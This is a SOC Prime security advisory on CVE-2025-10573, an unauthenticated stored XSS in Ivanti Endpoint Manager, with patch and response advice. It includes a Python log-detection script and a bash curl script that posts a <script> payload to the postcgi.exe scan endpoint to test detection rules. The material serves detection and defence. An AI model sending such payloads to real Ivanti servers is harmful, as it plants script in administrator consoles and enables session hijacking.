SOC Prime Bias: Critical

10 Dec 2025 19:54

CVE-2025-10573: Ivanti EPM Unauthenticated Stored XSS Vulnerability (Patched)

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Summary

Ivanti Endpoint Manager (EPM) contains a stored cross-site scripting vulnerability that lets an unauthenticated attacker inject malicious JavaScript into device scan data. When this payload is displayed in the management console web dashboard, it can be used to hijack an administrator’s session. The issue is tracked as CVE-2025-10573 and carries a CVSS score of 9.6.

Investigation

Rapid7 analysed an Ivanti EPM 11.0.6 Core deployment on Windows Server 2022 and found that a crafted POST request to /incomingdata/postcgi.exe with malicious key=value fields causes the JavaScript to be stored and later executed in the admin UI. The insecure behaviour of the CGI binary postcgi.exe, which writes scan files outside the web root, enables this injection path.

Mitigation

Ivanti released a patch on 2025-12-09, and upgrading to Ivanti EPM version 2024 SU4 SR1 removes the vulnerability. Rapid7 will ship an authenticated vulnerability check for Exposure Command, InsightVM, and Nexpose customers to help identify affected installations.

Response

Organizations should immediately deploy the 2024 SU4 SR1 update, restrict unauthenticated access to the /incomingdata API, and monitor web server logs for POST requests targeting postcgi.exe. They should also review administrator sessions for signs of hijacking and rotate any credentials that may have been compromised.
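One way to do the log review suggested above, as an added example (not SOC Prime's detection rule or Ivanti's tooling): it parses IIS W3C-format web server log lines, flags every POST to postcgi.exe, and raises the severity when the URL-decoded query string carries script markup or the client is outside the assumed agent network (10.0.0.0/24 here). The log lines are constructed for the example.

```python
from urllib.parse import unquote

# Constructed sample IIS W3C log lines (not real telemetry) in the default
# IIS field layout. The third line shows a client outside the agent subnet
# submitting a scan whose query string carries a URL-encoded <script> tag.
SAMPLE_IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2025-12-10 10:01:02 10.0.0.5 GET /remote/console.aspx - 443 admin 10.0.0.20 Mozilla/5.0 200
2025-12-10 10:01:15 10.0.0.5 POST /incomingdata/postcgi.exe prefix=ldscan&suffix=.scn 443 - 10.0.0.31 LANDesk+Agent 200
2025-12-10 10:02:40 10.0.0.5 POST /incomingdata/postcgi.exe prefix=ldscan&name=%3Cscript%3E 443 - 203.0.113.7 curl/8.4.0 200
2025-12-10 10:03:01 10.0.0.5 POST /IncomingData/PostCGI.exe prefix=ldscan 443 - 203.0.113.7 curl/8.4.0 200
"""

# Assumption for this example: managed endpoints report from 10.0.0.0/24,
# so a scan submission from any other address deserves a closer look.
AGENT_NETWORKS = ("10.0.0.",)
SCRIPT_MARKERS = ("<script", "javascript:", "onerror=", "onload=")


def parse_iis_log(text):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def find_postcgi_alerts(text):
    """Return one alert per POST to postcgi.exe, with the reasons it looks suspicious."""
    alerts = []
    for rec in parse_iis_log(text):
        if rec.get("cs-method") != "POST":
            continue
        # IIS paths are case-insensitive, so normalise before matching.
        if not rec.get("cs-uri-stem", "").lower().endswith("/incomingdata/postcgi.exe"):
            continue
        reasons = []
        query = unquote(rec.get("cs-uri-query", "")).lower()
        if any(marker in query for marker in SCRIPT_MARKERS):
            reasons.append("script markup in query string")
        if not rec.get("c-ip", "").startswith(AGENT_NETWORKS):
            reasons.append("client outside agent network")
        alerts.append({"time": rec["date"] + " " + rec["time"], "client": rec["c-ip"],
                       "severity": "high" if reasons else "info", "reasons": reasons})
    return alerts
```

IIS logs do not record request bodies, so a clean query string only lowers confidence; the "info" entries still deserve review against the expected agent inventory.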


Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An attacker, having discovered that the Ivanti EPM scan endpoint is unauthenticated, crafts a malicious scan payload embedding a <script> tag that displays an alert (representing session hijacking). The attacker uses curl to POST this payload, mimicking a legitimate device scan submission. Because the payload matches the exact string the rule watches for, the SIEM should generate an alert.

  • Regression Test Script:

    #!/bin/bash
    # -------------------------------------------------
    # Simulate stored XSS against Ivanti EPM scan API
    # -------------------------------------------------
    
    # Target URL (adjust host as needed)
    TARGET="https://ivanti.example.com/incomingdata/postcgi.exe?prefix=ldscan&suffix=.scn&name=scan"
    
    # Malicious payload – exactly the string the rule expects
    PAYLOAD="<script>alert('Administrator account has been hijacked')</script>"
    
    # Full XML body that Ivanti EPM expects (simplified)
    XML_BODY="<scan><device><id>99999</id><notes>${PAYLOAD}</notes></device></scan>"
    
    # Send the request
    curl -k -X POST "$TARGET" \
      -H "Content-Type: application/xml" \
      -d "$XML_BODY"
    
    echo "Malicious scan submitted."
  • Cleanup Commands:
    The scan data persists in the Ivanti EPM database; deletion typically requires an authenticated admin. For testing purposes, the cleanup step is limited to removing the test file from any local log capture.

    #!/bin/bash
    # Simple cleanup: remove temporary curl logs (if any)
    rm -f /tmp/curl_log_*
    echo "Local test artifacts removed."